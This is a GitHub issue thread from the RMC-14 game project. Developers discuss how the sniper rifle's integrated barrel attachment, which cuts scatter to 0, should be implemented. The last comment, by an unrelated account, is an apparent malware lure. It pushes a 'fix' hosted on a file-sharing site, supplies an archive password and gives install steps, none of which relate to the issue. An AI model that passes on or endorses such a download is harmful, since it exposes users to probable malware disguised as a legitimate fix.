### ISSUE TITLE
Sniper's Gun needs the sniper barrel

### ISSUE THREAD

**Issue by Vermidia** [RMC-14/RMC-14#3809]
## Description

Currently the rifle has a scatter of 6, this integrated attachment lowers it to 0 (and boosts accuracy when we get that). Still wont fix sniper until we get the other stuff but yeah.

**Reproduction**

**Screenshots**

![image](https://github.com/user-attachments/assets/52bda591-ebcc-4595-ae22-7050dbe1601c)

**Additional context**

**Comment by Siigiil** [comment]
I'll add it whenever I get around to coding accuracy.

**Comment by LankLTE** [comment]
It's probably worth adding without it? There are several other attachments that affect accuracy currently in the game and this one also affects scatter (in a relevant way too, given that it makes the scatter 0)

**Comment by Siigiil** [comment]
> It's probably worth adding without it? There are several other attachments that affect accuracy currently in the game and this one also affects scatter (in a relevant way too, given that it makes the scatter 0)

Probably. I just don't want to bother with making a separate PR for this thing. Also I need to do some rejuggling of attachment slots to allow attachable *barrels* to function properly along with things that are attached *to* the barrel, so it'll be easier to add it along with the rest of that stuff.

If you want to add it, you can do so. Though looking at this again, it's probably best we just integrate the barrel modifiers into the gun's base stats. The reason it's an attachment in CM is because it's needed to get the full gun sprite. We just do that with layers. So there's no real reason for it to exist, since it's not removable and doesn't do anything else we can't do on the gun itself.

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
